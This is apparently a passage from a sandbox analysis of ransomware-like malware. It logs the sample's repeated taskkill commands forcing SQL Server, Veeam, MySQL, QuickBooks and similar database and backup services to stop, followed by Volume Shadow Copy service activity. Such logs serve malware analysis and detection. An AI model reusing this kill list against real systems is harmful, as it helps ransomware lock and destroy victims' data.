C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵PID:1056
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbeng8*3⤵PID:2600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:2432
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵PID:1028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵PID:3640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵PID:3804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵PID:2700
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵
- Kills process with taskkill
PID:2968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1496
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵PID:2184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MySQL57*3⤵
- Kills process with taskkill
PID:2708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵PID:3632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵PID:2824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵PID:3092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:3240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:1164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
PID:520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:1912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵
- Kills process with taskkill
PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:3900
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵
- Kills process with taskkill
PID:3936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:1320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:2096
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵
- Kills process with taskkill
PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:1484
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:2728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
- Kills process with taskkill
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵PID:2460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBFCService*3⤵PID:404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵PID:3704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Kills process with taskkill
PID:492
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell [System.Net.Dns]::GetHostByAddress('10.10.0.27').hostname2⤵PID:1788
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:3312